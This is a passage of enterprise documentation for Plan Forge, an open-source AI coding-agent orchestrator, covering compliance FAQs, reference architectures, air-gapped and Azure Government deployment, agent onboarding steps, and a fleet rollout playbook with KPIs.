| Where does our source code go when we run Plan Forge? | Compliance — Data Flow |
| Can we run Plan Forge fully air-gapped? | Compliance — Air-Gapped |
| Does Plan Forge work with Azure Government? | Compliance — Azure Government |
| What about HIPAA, FedRAMP, SOC2, PCI? | Compliance — Compliance Posture |
| You're asking | Read |
|---|---|
| How does authentication work today? | Compliance — Identity |
| What's the roadmap for Entra ID / SAML / SCIM? | Compliance — Roadmap |
| You're asking | Read |
|---|---|
| Can we ship Plan Forge traces to Splunk / Datadog / Application Insights? | Compliance — Observability Export |
| You're asking | Read |
|---|---|
| How do we estimate cost for a plan before running it? | Fleet Operator Playbook — Cost Discipline |
| How do we attribute cost to teams and engineers? | Fleet Operator Playbook — Cost Attribution |
We are deliberate about lanes. Plan Forge is not:
localhost:3100. Customers own their deployment top to bottom.If you have 30 minutes:
If you have 90 minutes:
If you want to run it:
Plan Forge is built on five non-negotiables that show up in every layer:
.github/instructions/architecture-principles.instructions.md)gen_ai.*, adopt, don't inventCustomers can read the same instruction files Plan Forge agents read. Nothing is hidden. The framework is the documentation.
Plan Forge is open source (MIT). Support model is honest:
forge_meta_bug_file lets agents file defects against Plan Forge itself when they encounter them, and the project is dogfooded against itselfFor enterprises that need a commercial relationship, the right pattern today is to use Plan Forge directly and engage your usual platform-services partner (Microsoft FDE, Slalom, Accenture, etc.) for integration work.

One canonical architecture for a 5-team / 1000-developer fleet, plus the Microsoft Foundry composition variant for Azure-tenant deployments.
Audience: Platform architects and security engineers planning a multi-team Plan Forge deployment.
Scope: Generic enterprise architecture (Pattern A) and the Microsoft Foundry composition variant (Pattern B). Plus three network/isolation patterns including the air-gapped option that's a structural differentiator.
Three constraints shape every architecture below:
gen_ai.* semantic conventions. No proprietary file formats.| Component | Owns | Does not own |
|---|---|---|
| Developer workstation | Local plan execution, IDE-time orchestration, the dashboard, all .forge/ artifacts | Multi-team aggregation, long-running compute |
| GitHub Enterprise | Source of truth for repos, issues, PRs. Hosts Copilot Cloud Agent runs. Runs Actions workflows | Plan-level orchestration. Quality / eval / drift detection |
| Actions runners | Long-running plan execution, scheduled pforge run-plan jobs, fleet-scale dispatch | Interactive developer-loop workflows |
| OTel collector + backend | All trace, metric, and log aggregation across teams | Real-time agent control |
| LLM provider | Inference for worker LLM calls | Plan state, scope enforcement, gate validation |
.forge/runs/<id>/ locally and emitted to the OTel collector for fleet aggregation.pforge diff) checks scope-contract adherence before merge.For customers running on Microsoft Foundry (Azure OpenAI, Foundry Agent Service, Foundry Toolboxes), Plan Forge composes as the SDLC orchestrator layer above Foundry's model gateway and agent runtime.
https://{resource}.openai.azure.com/openai/v1/. Auth via Entra ID (recommended), API key, or managed identity. Customer configures deployment names, not model families.gen_ai.* spec). Pointed at the Foundry-attached Application Insights resource, Plan Forge runs show up in the same dashboards as Foundry agent runs.deploy.instructions.md and the skill system include /staging-deploy and similar skills that target Foundry deployment paths.from azure.identity import DefaultAzureCredential, get_bearer_token_provider
token_provider = get_bearer_token_provider(
DefaultAzureCredential(), "https://ai.azure.com/.default"
)
client = OpenAI(
base_url="https://YOUR-RESOURCE.openai.azure.com/openai/v1/",
api_key=token_provider,
)
Required role assignment on the Foundry resource: Cognitive Services OpenAI User or Contributor.
eastus-prod-mini).gpt-5.1, gpt-4.1 family, o3-mini, gpt-4o). Use the power-gov quorum preset (or graceful fallback) when targeting Azure Government.Plan Forge is structurally compatible with all three. Pattern 3 is the differentiator, Cursor cannot offer this (control plane in AWS), Sourcegraph Amp explicitly cannot (no self-host, no BYOK), GitHub Copilot Cloud Agent runs on GitHub-hosted infrastructure. For air-gapped requirements, Plan Forge is structurally the only viable option in the comparison set.
For a team of ~50 developers running ~3 plans/day per developer:
| Resource | Estimate |
|---|---|
| Plan Forge orchestrator processes | One per active developer, low CPU/memory (Node.js process, dashboard at :3100) |
| GitHub Actions minutes (CCA-dispatched plans) | ~15K min/month (varies wildly by plan complexity) |
| LLM tokens (mixed-mode quorum) | ~50M input + 10M output per team-month at moderate use |
Storage (.forge/runs/ retention) | ~5GB / team / quarter at typical detail |
| OTel trace volume | ~100K spans / team / day |
.forge.json per repo or per team| Failure | Detection | Mitigation |
|---|---|---|
| LLM provider outage | OTel error rate spike on gen_ai.* spans | Plan Forge supports multi-provider routing in .forge.json. Failover order configurable per slice |
| AOAI quota exhausted mid-slice | Worker error, gate failure | Preflight quota check (planned), slice retry with backoff, cross-region failover via deployment alias |
| GitHub Actions runner exhaustion | Workflow queue depth, Cloud Agent session pending | Self-hosted runner pool, prioritize critical plans via [P] tag and runner labels |
| Plan drift (PR diverges from approved plan) | pforge diff post-execution | Pre-merge gate fails; reviewer-gate agent flags; review thread opened via forge_review_add |
| Cost runaway (slice loops or model misroutes) | forge_cost_report anomaly, dashboard cost-tile alert | Per-slice workerTimeoutMs cap, forge_alert_triage priority queue, in-loop stuck detector (planned) |
For an enterprise rolling out across 5 teams in 90 days:
| Week | Milestone |
|---|---|
| 0 | Stakeholder alignment, pick LLM provider strategy, identify pilot team |
| 1–2 | Pilot team installs Plan Forge, runs first plan against a known-easy feature, baseline cost + cycle time |
| 3–4 | Pilot team runs 5+ plans, refines instruction files, captures lessons |
| 5–6 | Add team 2 + team 3 in parallel; first multi-team observability dashboards |
| 7–8 | Add teams 4 + 5; introduce shared MCP server (Foundry Toolbox or in-house equivalent) |
| 9–10 | Org-wide rollout patterns formalized; cost guardrails; quality KPIs reported up |
| 11–12 | First quarterly review; eval data informs next-quarter planning |
See Appendix M — Fleet Operator Playbook for week-by-week specifics.

Get a fleet of specialized agents productive on Day 1, not Day 90. A repeatable 7-step recipe.
Audience: Platform leads onboarding 12+ "Virtual Squad" agent personas across product teams in the first weeks of a Plan Forge rollout.
Goal: One work day for the first squad, one hour per additional squad thereafter.
Plan Forge ships 12 agent personas out of the box (6 stack-specific + 7 cross-stack + 5 pipeline + 1 audit-classifier). Each is a Markdown file under .github/agents/ with a YAML frontmatter description and a body that defines the persona's expertise, tone, and lane. Agents are invoked from chat (agent picker dropdown) or referenced from a plan slice (agent: security-reviewer). They cannot edit files, they audit and report.
The "Agent Factory" is the configuration plus convention layer that makes those 20 personas productive against a customer's specific stack on Day 1, instead of generic-but-vague.
1. SUBSTRATE , confirm GitHub-native primitives are in place
2. CONFIGURE , write project profile + project principles (one hour each)
3. ROUTE , assign agents to lanes (which agents own which kinds of work)
4. SHARED CONTEXT, populate AGENTS.md, copilot-instructions.md, instruction files
5. SHARED TOOLS , point at MCP servers (Plan Forge MCP, github-mcp-server, optional Foundry Toolbox)
6. PILOT , run one real plan with the full agent fleet, capture friction
7. ITERATE , encode lessons in instruction files; re-run
Each step below is one to two hours for a platform lead familiar with the codebase. The whole recipe is achievable in one work day for the first squad and replicates in one hour per additional squad thereafter.
Verify the GitHub-native primitives Plan Forge depends on are enabled in the org:
| Primitive | Check | If missing |
|---|---|---|
| GitHub Copilot Enterprise | Org admin → Copilot tab → "Copilot Enterprise" enabled | Provision before continuing |
| Copilot Cloud Agent | Org admin → Copilot tab → Cloud Agent toggle ON for target repos (or via custom properties) | Enable per GitHub docs |
| GitHub Actions enabled per repo | Repo settings → Actions → "Allow all actions" or specific allowlist | Enable per repo |
| MCP support in IDE | VS Code 1.95+ with chat.mcp.enabled setting on, or Copilot CLI 1.x | Update IDE / install CLI |
| AGENTS.md aware tooling | At least one of: Claude Code, Cursor, Codex, Amp, Aider, Gemini CLI, Goose, Windsurf | Pick at least one, they're Plan Forge's worker options for non-CCA paths |
If any are missing, fix before moving on. The factory recipe assumes the substrate is in place.
Plan Forge ships two prompts that, run once, produce the configuration that downstream agents inherit:
project-profile.prompt.md — what your stack isA guided interview that produces .github/instructions/project-profile.instructions.md. Captures:
This file auto-loads (via applyTo: '**' in frontmatter) for every agent session in the repo. Run it once per repo. It's the foundation everything else assumes.
project-principles.prompt.md — what your team commits toA second interview that produces docs/plans/PROJECT-PRINCIPLES.md plus a companion .github/instructions/project-principles.instructions.md. Captures:
This file is loaded by the SessionStart hook and pinned in agent context for the duration of every session.
Profile = facts about the stack. Principles = commitments about how the team works. Confusing the two is a common mistake. Profile is descriptive; principles is prescriptive. Both feed every agent every session.
Plan Forge ships these 20 personas. Decide who owns what for your team:
| Agent | Owns |
|---|---|
architecture-reviewer | Layer separation, pattern adherence, refactor proposals |
database-reviewer | Schema, migrations, query performance, ORM patterns |
deploy-reviewer | Dockerfiles, CI/CD config, deployment scripts |
performance-reviewer | Hot/cold path analysis, allocation, profiling |
security-reviewer | Input validation, secret handling, OWASP, auth |
test-runner | Test coverage, test quality, fixture sanity |
| Agent | Owns |
|---|---|
api-contracts-reviewer | OpenAPI consistency, breaking change detection |
accessibility-reviewer | WCAG, ARIA, keyboard navigation |
multi-tenancy-reviewer | Tenant isolation, row-level security, cross-tenant query risk |
ci-cd-reviewer | Pipeline correctness, runner sanity, gate completeness |
observability-reviewer | Trace coverage, log quality, metric meaningfulness |
dependency-reviewer | Vulnerability scanning, license compliance, version hygiene |
compliance-reviewer | GDPR / CCPA / SOC2 / HIPAA / PCI-DSS conformance |
| Agent | Stage |
|---|---|
specifier | Step 0: define what & why |
plan-hardener | Step 2: harden plan into execution contract |
executor | Step 3: execute slices with validation gates |
reviewer-gate | Step 5: independent review and drift detection |
shipper | Step 6: commit, deploy, close |
Step 1 (preflight) ships as a prompt, not an agent, see .github/prompts/step1-preflight-check.prompt.md. It runs inline rather than as a separate persona.
| Agent | Role |
|---|---|
audit-classifier-reviewer | Reviews changes to the audit classifier itself; enforces before/after finding counts |
For each agent, pick:
Document the routing in .github/agents/ROUTING.md (you may need to create this, it's not yet a Plan Forge default but the convention is clean and we recommend adopting it).
Plan Forge generates these on setup.ps1 / setup.sh. The factory step is to populate them with project-specific content beyond the templated defaults.
AGENTS.md (repo root)The Linux Foundation-stewarded standard read by Claude Code, Cursor, Codex, Amp, Aider, Gemini CLI, Goose, Windsurf, and others. Contents:
Plan Forge keeps this in sync with the project-profile output, but review the generated content, generic phrasing here costs you on every agent run.
.github/copilot-instructions.mdThe GitHub-native equivalent. Contains:
Plan Forge generates a strong default. Customize the "Project Overview" section with your team's specifics.
.github/instructions/*.instructions.mdPlan Forge ships 18 of these per preset (the dotnet/typescript/python/etc. preset directories under presets/, each with its own .github/instructions/). Each has an applyTo glob that controls when it auto-loads:
| File | Loads on |
|---|---|
architecture-principles.instructions.md | ** (always, universal baseline) |
project-profile.instructions.md | ** (always, your stack) |
project-principles.instructions.md | ** if PROJECT-PRINCIPLES.md exists |
git-workflow.instructions.md | ** |
api-patterns.instructions.md | ** |
auth.instructions.md | ** |
database.instructions.md | ** |
security.instructions.md | ** |
testing.instructions.md | ** |
errorhandling.instructions.md | ** |
deploy.instructions.md | ** |
observability.instructions.md | ** |
caching.instructions.md | ** |
messaging.instructions.md | ** |
multi-environment.instructions.md | ** |
performance.instructions.md | ** |
version.instructions.md | ** |
status-reporting.instructions.md | docs/plans/**, pforge-mcp/**, .forge/** |
context-fuel.instructions.md | ** |
self-repair-reporting.instructions.md | ** |
These are templated. Read each one. Add team-specific guidance where the template is generic.
Configure .vscode/mcp.json (Plan Forge generates this; you augment) with the MCP servers the fleet should share:
{
"mcpServers": {
"plan-forge": {
"command": "node",
"args": ["./pforge-mcp/server.mjs"]
}
}
}
{
"github": {
"url": "https://api.githubcopilot.com/mcp/",
"auth": "oauth"
}
}
The github-mcp-server gives every agent in the fleet first-class access to GitHub Issues, PRs, repos, code-scanning alerts, and 19 other toolsets. 29.5k stars, MIT, official.
{
"foundry-toolbox": {
"url": "https://YOUR-FOUNDRY-TOOLBOX-ENDPOINT/mcp",
"auth": {
"type": "bearer",
"tokenSource": "azure-keyvault://your-vault/foundry-toolbox-pat"
}
}
}
Foundry Toolboxes are MCP-compatible endpoints that bundle Web Search, Code Interpreter, File Search, Azure AI Search, OpenAPI tools, and Agent-to-Agent connections behind a single endpoint with versioning, auth, and policy enforcement. Single source of truth for the org's tools, consumed identically by Plan Forge agents in worker sessions and by Foundry agents in production.
{
"azure-devops": {
"url": "https://YOUR-FOUNDRY-CATALOG/mcp/azuredevops",
"auth": "oauth"
}
}
Microsoft ships an Azure DevOps MCP Server (preview) as a Foundry catalog entry.
Pick a real, small feature for the pilot. Not a toy. Not a refactor. A tangible feature with a clear acceptance criterion.
Run the full pipeline:
step0-specify-feature.prompt.md, define what & whystep1-preflight-check.prompt.md, verify prerequisitesstep2-harden-plan.prompt.md, harden the plan into an execution contractpforge run-plan --estimate <plan>, see projected cost under each quorum modepforge run-plan <plan>, execute (or --assisted for human-in-the-loop)step5-review-gate.prompt.md, independent reviewWatch for:
pforge diff should be clean. If it's not, the plan was too vague.Every Plan Forge project should be doing this constantly:
The factory's value compounds. The first plan teaches you 5 things. The fifth plan teaches you 1. By the tenth plan, the agents are productive against your specific codebase, not generic.
After the first squad is productive, replicate to additional teams:
For a 5-team / 1000-dev rollout, the factory typically takes:
| Mistake | Symptom | Fix |
|---|---|---|
| Generic project profile | Agents give generic advice; reviewers ignore them | Re-run project-profile.prompt.md with thoughtful answers, not defaults |
| No project principles | Agents drift outside scope; PRs widen unexpectedly | Run project-principles.prompt.md; document forbidden patterns explicitly |
| Default agent routing | Reviewers fire on irrelevant changes; humans tune them out | Document routing in .github/agents/ROUTING.md per team |
| Skip AGENTS.md customization | AGENTS.md-aware agents (Cursor, Claude Code) give weak suggestions | Read the generated AGENTS.md; add team-specific build/test/style content |
| One MCP server forever | Agents lack access to org-specific tools; humans bridge manually | Add Foundry Toolbox or in-house MCP servers as fleet matures |
| First plan is a toy | Lessons don't scale to real work | Pilot a real, small feature, never a hello-world |
| No iteration loop | Same friction in plan 2, plan 3, plan 4 | After every plan, ask "what would make plan N+1 better?", encode the answer in instruction files |
After 30 days with the factory in place:
pforge diff clean ≥ 80% of the timeThese are real numbers from dogfooding. They scale linearly with the discipline applied to the factory configuration.

A calendar, not a feature list. Day 1 / Week 4 / Week 12 milestones with concrete go/no-go criteria for operating Plan Forge across multiple product teams.
Audience: Platform leads operating Plan Forge across multiple product teams.
How to use: Each phase has a goal, activities, go/no-go criteria, and anti-patterns. If you're following it strictly and something feels off, that's a signal worth investigating, not a step to skip.
Before you begin:
If any of these aren't true, work on them first. Plan Forge accelerates teams that already have direction; it doesn't substitute for it.
Pilot team has Plan Forge installed, has run one plan end-to-end against a real (small) feature, and has a baseline measurement of cycle time and cost.
git clone https://github.com/srnichols/plan-forgesetup.ps1 (Windows) or setup.sh (Mac/Linux) in target projectpforge smith returns cleanproject-profile.prompt.md once for the pilot repoproject-principles.prompt.md onceAGENTS.md and .github/copilot-instructions.md.vscode/mcp.json with Plan Forge MCP server + github-mcp-server (and Foundry Toolbox if applicable)step0 through step5 of the pipelinepforge run-plan --estimate <plan> first to see projected costpforge run-plan --assisted <plan> for human-in-the-loop the first timepforge diff.forge/baseline-2026-05-06.json or your team's metrics store| Signal | Pass | Fail |
|---|---|---|
| First plan ran end-to-end | Yes | Stop, debug |
pforge diff clean post-merge | Yes (drift score ≥ 80) | Plan was too vague, re-harden |
| Cost within 50% of estimate | Yes | Either pricing data is stale or workload differs from typical, investigate |
| Pilot team's reaction | "Useful, with caveats" | "Confusing" or "in the way", review configuration |
--assisted first time, first plan should be observablePilot team runs 5+ plans, friction patterns become visible, instruction files start to encode lessons.
.github/instructions/* as a result| Signal | Pass | Fail |
|---|---|---|
| ≥ 5 plans completed | Yes | Slow uptake, investigate barriers (often: fear of cost, unclear when to use vs not) |
| Drift score average ≥ 70 | Yes | Plan-hardener prompt needs project-specific tuning |
| Instruction files updated ≥ 3 times | Yes | Team isn't iterating, that's the value loop, must enable it |
| Cost-per-PR trending down or stable | Yes | Cost going up plan-over-plan suggests waste, investigate slice sizing |
Pilot team is self-sufficient. Second team starts, with patterns from Pilot 1 captured as templates. First multi-team observability dashboards live.
AGENTS.md style and .github/instructions/* (forks where stack differs).github/agents/ROUTING.md--assisted modelocalhost:3100 shows per-developer; the OTel backend shows org-wide| Signal | Pass | Fail |
|---|---|---|
| Pilot team self-sufficient | Yes | Means platform team is still bottleneck, extract patterns into docs |
| Team 2 ran first plan within 1 day of onboarding | Yes | Onboarding pattern needs simplification |
| Multi-team dashboards reflect real data | Yes | OTel pipeline issue, fix before adding more teams |
| Cost per merged PR vs. baseline | Trending down or stable | If up, investigate model routing and slice sizing |
4 of 5 teams active. Shared MCP server (Foundry Toolbox or in-house) deployed. Reviewer agents are catching real issues at PR time.
.vscode/mcp.json to consume.forge.jsonforge_alert_triagepforge diff clean)| Signal | Pass | Fail |
|---|---|---|
| 4 teams active and self-sufficient | Yes | Onboarding pattern still has friction; investigate |
| Shared MCP server reduces per-team config drift | Yes | Adoption needs nudging, show concrete value |
| Reviewer-agent comments acted on ≥ 30% of the time | Yes | Personas need tuning, or routing is wrong |
| Cost guardrails preventing runaway | Yes | Budgets ineffective, likely too high or unenforced |
All 5 teams active. First quarterly review of fleet metrics. Plan for next quarter.
forge_health_trend aggregates the quarter's data/memories/repo/) captures the institutional learningforge_meta_bug_file)| Signal | Pass | Fail |
|---|---|---|
| All 5 teams operating without daily platform support | Yes | Fleet is too dependent, invest in self-service |
| Cost per merged PR is below baseline | Yes | Diminishing returns, investigate where time is going |
| Quarterly KPIs trending right direction | Yes | Hypothesis was wrong somewhere, adjust |
| Engineering leadership confident in scale-out to next 5 teams | Yes | Trust gap, surface what's missing |
The metrics that matter at the fleet level:
| KPI | Source | Healthy range |
|---|---|---|
| Cycle time (spec → merged PR) | OTel + git history | 30–70% of pre-Plan-Forge baseline |
| Cost per merged PR | forge_cost_report | Stable or declining month-over-month |
| Plan adherence (drift score) | forge_diff per plan | ≥ 80% of plans clean |
| Gate failure rate | forge_health_trend | < 30%; failures should drive instruction updates |
| Regressions caught at gate vs. production | Bug registry + OTel | Ratio improving over time |
| Reviewer-agent acceptance rate | Manual sampling | ≥ 30% of comments acted on |
| Plan Forge plans / total PRs | forge_health_trend | Grows over time toward team comfort level |
| Per-engineer cost (when implemented) | Cost service (planned) | Outliers investigated, not punished |
| Time-to-green per slice | OTel + slice events | Stable or improving |
Three habits that make cost predictable:
pforge run-plan --estimate <plan> shows projected cost across all four quorum modes (auto, power, speed, false). Look at the numbers before the spend.power (Opus + GPT-5 + Grok consensus, threshold 5) is for high-stakes architectural slices. speed (cheaper models, threshold 7) is for high-volume routine work. auto makes a per-slice judgment. false is single-model. Use them deliberately.Today, Plan Forge tracks cost per plan, per slice, per model. Per-engineer attribution is on the roadmap (planned), until then, the workaround is:
.forge/cost-history.json is their own ledgerservice.namespace, service.instance.id)For finance teams that need formal chargeback, the OTel data is the source of truth, not the dashboard.
Two patterns work; pick one and stick with it:
Pros: teams move at their own pace, instruction files reflect team culture, no central bottleneck.
Cons: harder to enforce org-wide patterns.
.github-private/ template repoPros: consistency across teams, easier compliance posture.
Cons: bottlenecks if platform team is small; teams may resent loss of autonomy.
The right answer depends on your engineering culture. Federated works for cultures that value team autonomy; centralized works for cultures that value consistency.
Plan Forge is software. Software has bugs. The escalation path:
forge_meta_bug_file when they encounter a defect during execution. The tool routes to the Plan Forge GitHub repo with a stable hash to deduplicatesrnichols/plan-forge for non-emergency defectspackage.json if a recent release introduced the defect; rollback is one npm install awayPlan Forge is open source. There is no commercial support tier today. The escalation model is community + your own platform team's competence.
| Mistake | Symptom | Fix |
|---|---|---|
| Adding teams faster than the fleet can absorb | Inconsistent quality, cost surprises, frustrated devs | One team at a time until self-sufficient; don't compress for OKR optics |
| Skipping the iteration loop | Same friction in plan 50 as in plan 5 | Mandate post-plan retro; encode lessons in instructions |
| Treating Plan Forge as "set it and forget it" | Quality degrades; agents feel stale | It's a living configuration; budget time monthly to maintain |
| Reviewer agents fire on everything | Humans tune them out; signal lost | Tune routing per team; advisory ≠ blocking ≠ escalation |
| Cost reports go unread | Surprises at month-end | Daily cost dashboard for first month, weekly thereafter |
| No on-call for fleet-level Plan Forge issues | One engineer is the SPOF | Document operations model; rotate ownership |
| Eval data ignored | Trajectories accumulate; learning doesn't compound | Quarterly review trajectories; promote useful patterns |

Where data lives, what's logged, how to export for audit, identity (today and roadmap), and the air-gapped / Azure Government deployment paths.
Audience: Security architects, compliance officers, and platform leads conducting a security review of Plan Forge.
Scope: Where data lives, what's logged, how to export for audit, identity model (today and roadmap), and the air-gapped / Azure Government deployment paths.
Plan Forge is local-first. The orchestrator runs on the developer's machine or a CI runner inside the customer's network. There is no Plan Forge SaaS service. Source code does not leave the customer's network unless the customer chooses to call a hosted LLM (and even then, all logging stays local). The audit trail is structured, complete, and exportable. Identity is currently bearer-token only and is the largest gap on the roadmap.
| Concern | Status |
|---|---|
| Source code leaves network | Only when customer-configured LLM provider is hosted; all logging stays local |
| Audit log of agent actions | Structured, complete, production-grade today (telemetry.mjs, EVENTS.md) |
| Audit log export | OTel exporter on roadmap (Week 2 of enterprise hardening); manual export available today |
| Identity / SSO | Bearer token only today; Entra ID / SAML / SCIM on roadmap |
| RBAC | None today; on roadmap |
| Data residency controls | Customer chooses LLM provider region; Plan Forge respects |
| Air-gapped deployment | Architecturally supported; documentation gap (this doc) |
| Encryption at rest | Customer's filesystem encryption (Plan Forge respects) |
| Secret redaction | Built-in for testbed findings; configurable scope on roadmap |
| FedRAMP / IL5 / IL6 / HIPAA / PCI / SOC2 | Plan Forge is OSS, compliance posture is the customer's deployment, not a Plan Forge certification |
Five concrete data movements. For each, who handles the data and where it goes.
Stays in the customer's network, except for:
If you use only on-prem inference (Foundry Local, Ollama, vLLM, llama.cpp, etc.), source code never leaves your network for any reason.
Stay in the customer's repo. Plan files (docs/plans/*.md) are committed to git. They live wherever the repo lives.
.forge/ artifactsStay on the local filesystem (developer machine or CI runner). Includes:
.forge/runs/<id>/, per-run trajectory, events, slice artifacts, summary, traces, cost history.forge/cost-history.json, aggregate cost.forge/telemetry/tool-calls.jsonl, MCP tool invocations.forge/liveguard-events.jsonl, LiveGuard scan events.forge/trajectories/<plan-slug>.jsonl, Copilot Coding Agent trajectories (when CCA is the worker).forge/fm-sessions/*.jsonl, Forge-Master conversation sessions.forge/ is gitignored by default. It can be committed for audit purposes if your security policy requires.
Three tiers, three different residency stories:
| Tier | Location | Lifetime | Notes |
|---|---|---|---|
| L1 (volatile hub) | In-process RAM | Per-process | Bounded ring buffer, evicted on restart |
| L2 (structured) | Local filesystem (.forge/, .github/, docs/plans/) | Persistent | Survives restart; lives where the repo lives |
| L3 (semantic via OpenBrain) | External Postgres + pgvector (optional) | Forever | Cross-project by design. If used, deploy the Postgres in your network |
If L3/OpenBrain is not configured, Plan Forge runs single-project, single-session memory only. No external service required.
By default, telemetry stays local in .forge/telemetry/. With the OTel exporter (Week 2 of enterprise hardening), traces and metrics are emitted in the OpenTelemetry gen_ai.* semantic-convention format to a customer-chosen OTLP endpoint. Common targets:
The OTel exporter is off by default. Enable by setting OTEL_EXPORTER_OTLP_ENDPOINT.
Plan Forge emits structured events for 38 event types across eight families. The full ebook reference, envelope, enums, payloads, retention, is Appendix V — Event Catalog; the canonical JSON schema lives in pforge-mcp/EVENTS.md. Categories include:
run-started, slice-started, slice-completed, run-completed)quorum-started, quorum-model-replied, quorum-synthesized)drift-, incident-, secret-scan-, dep-watch-)Each event carries:
| Sink | Format | Retention |
|---|---|---|
.forge/runs/<id>/events.log | NDJSON | Per-run, kept until manual cleanup |
.forge/runs/<id>/trace.json | OTLP-compatible | Per-run |
.forge/telemetry/tool-calls.jsonl | NDJSON, append-only | Persistent |
.forge/liveguard-events.jsonl | NDJSON, append-only | Persistent |
| Hub event stream | In-memory + WebSocket | Volatile (last N events) |
Today (manual):
# Aggregate all events from a date range
jq -s 'sort_by(.ts)' .forge/runs/*/events.log > audit-export.json
# Or use forge_search for filtered export
pforge search --since 2026-04-01 --sources run,liveguard,bug --output audit.json
Roadmap (Week 2 of enterprise hardening): pforge audit export --since <date> --format <json|csv> as a first-class CLI.
Built-in for testbed findings (defect-log.mjs). High-entropy secret detection in diffs (forge_secret_scan) always redacts values; findings are masked before caching or display. Plan to formalize as a configurable scope in Week 3 (auth/RBAC scaffolding).
Plan Forge supports:
bridge.approvalSecret in .forge.json).forge/secrets.json for LLM providers (OpenAI, Anthropic, xAI, GitHub Copilot, Azure OpenAI when manually configured)Known secrets recognized:
GITHUB_TOKENXAI_API_KEYOPENAI_API_KEYANTHROPIC_API_KEYOPENCLAW_API_KEYNot yet supported as first-class:
AZURE_OPENAI_API_KEY + endpoint URL (works manually; first-class config on roadmap)Order of priority based on enterprise requests:
AZURE_OPENAI_API_KEY and endpoint as recognized secrets, deployment-name vs model-name handled in config, Entra ID auth via azure-identity SDKIf your security review requires SSO/SCIM/RBAC today, Plan Forge is not a fit. The honest answer matters more than overpromising.
Plan Forge is open-source software (MIT license). Compliance certifications (FedRAMP, IL5/IL6, HIPAA, PCI-DSS, SOC2) attach to the customer's deployment of Plan Forge, not to Plan Forge itself. There is no Plan Forge SaaS to certify.
Even so, several Plan Forge architectural choices are friendly to compliance audits:
| Posture | What helps |
|---|---|
| No SaaS data plane | Nothing to subpoena from a vendor; data lives where you put it |
| Structured audit trail | Every action logged with timestamps, correlation IDs, severity |
| Open source | Auditable end-to-end; no proprietary closed binaries |
| Local-first by default | Air-gapped deployment is structurally possible (see below) |
| Open standards | AGENTS.md, MCP, OTel gen_ai.*, no proprietary lock-in to challenge |
| Compliance reviewer agent | .github/agents/compliance-reviewer.agent.md ships out of the box for GDPR/CCPA/SOC2/HIPAA-aware code review |
| Project profile compliance frameworks | .github/prompts/project-profile.prompt.md collects SOC2, HIPAA, PCI-DSS, GDPR, FedRAMP early in setup |
For specific frameworks:
gpt-5.1, gpt-4.1, o3-mini, gpt-4o).forge/ artifacts are deletablePlan Forge is architecturally compatible with fully air-gapped deployment. The complete pattern:
localhost:3100).forge/ artifact storage| Component | Air-gapped solution |
|---|---|
| LLM inference | Use Foundry Local powered by Azure Local (preview May 2026), Ollama, vLLM, llama.cpp, or similar on-prem inference. Configure as the OpenAI-compatible endpoint Plan Forge talks to. |
| GitHub Enterprise | Use GitHub Enterprise Server (GHES) instead of GitHub.com. Plan Forge supports GHES; Cloud Agent local-MCP-server pattern works |
| Update checks | Set PFORGE_NO_UPDATE_CHECK=1 to disable. Manual updates via pforge self-update --from-local <path> or repo sync from internal mirror |
| OpenBrain L3 memory | Optional; if used, deploy the Postgres+pgvector inside the boundary |
| MCP servers | Self-host any MCP server you want available; point .vscode/mcp.json at internal endpoints only |
pforge ext add --from-local <path> for vetted extensions)srnichols/plan-forge updatesPFORGE_NO_UPDATE_CHECK=1 setThis is the differentiator vs. competitors. Cursor cannot offer this (control plane in AWS even with self-hosted workers). Sourcegraph Amp explicitly cannot (no self-host, no BYOK). GitHub Copilot Cloud Agent runs on GitHub-hosted infrastructure. For air-gapped requirements, Plan Forge is structurally the only viable option in the comparison set.
For customers deploying in Azure Government:
openai.azure.us (not openai.azure.com)login.microsoftonline.us Entra ID (when first-class Entra support lands)Azure Government has a substantially smaller catalog than commercial Azure:
gpt-5.1gpt-4.1gpt-4.1-minio3-minigpt-4otext-embedding-3-large, text-embedding-3-small, text-embedding-ada-002Available in usgovarizona and usgovvirginia, with Data Zone Standard and Provisioned variants.
power quorum preset (assumes flagship models like gpt-5.5 or claude-opus-4.7) won't resolve cleanlypower-gov preset (planned) or graceful fallbackspeed preset works (gpt-4.1-mini exists in gov)Both global Azure and Azure Government are FedRAMP High. Azure Government adds contractual commitments around US-based data storage and screened-US-persons access. HIPAA and PCI are covered under Azure's standard compliance umbrella for the underlying services; Plan Forge running on top inherits the boundary.
For Azure Government Secret and Top Secret cloud feature availability, contact your Microsoft account team, public documentation is limited.
The Week 2 work in the enterprise hardening track adds first-class OpenTelemetry export. Spec is documented in the enterprise-fleet-readiness research §8.6. Summary:
gen_ai.* attribute set including token counts (input, output, cache_read, cache_write, reasoning), latency, model, providergen_ai.client.operation.duration histogram, gen_ai.client.token.usage histogramgen_ai.client.inference.operation.details with input/output messages (gated by pforge.telemetry.captureContent flag, default off, PII implications)pforge.* attributes for plan/slice/run correlation, scope contract IDs, gate names, cost USD (since gen_ai.cost doesn't exist in the spec).
Anything that speaks OTLP. Tested compatibility (planned for Week 2):
gen_ai.* conventions, so Plan Forge runs land in the same dashboards as the customer's Foundry agents)pforge.telemetry.captureContent config flag and standard OTel env varsWherever you choose to send it via your configured LLM provider. With on-prem inference, nowhere outside your network. Plan Forge itself never transmits source code.
No telemetry is transmitted to Plan Forge maintainers. The optional update check fetches release metadata from GitHub. Disable with PFORGE_NO_UPDATE_CHECK=1.
Yes. Per-run trajectory in .forge/runs/<id>/ includes events, slice artifacts, traces, cost history, and (for CCA-dispatched runs) the full Copilot Cloud Agent trajectory.
Plan Forge enforces scope contracts at the plan level (In Scope, Out of Scope, Forbidden Actions blocks). Pre-tool-use hooks block edits to forbidden paths. Post-execution pforge diff checks for drift.
Honest gap: enforcement is best-effort at the worker level, the orchestrator can't always prevent a bad edit, only detect it. Roadmap item to harden.
Per-slice workerTimeoutMs cap kills runaway workers. Reflexion retry with backoff handles recoverable failures. forge_alert_triage ranks issues by priority. In-loop stuck detector is on the roadmap (OpenHands-pattern).
.forge.json per repo supports cost.dailyMax and similar caps (planned formalization). Per-engineer attribution is on the roadmap.
Plan Forge does not delete .forge/ artifacts automatically. Retention is the customer's policy, implement via standard filesystem tools or post-run cleanup hooks.
Plan Forge does not cache LLM responses. Some LLM providers (Anthropic, OpenAI) do prompt caching, that's their infrastructure, billed at reduced rates. Plan Forge tracks cache hit/miss for cost accuracy (Phase-COST-TOKEN-COVERAGE landed the per-vendor billing math).
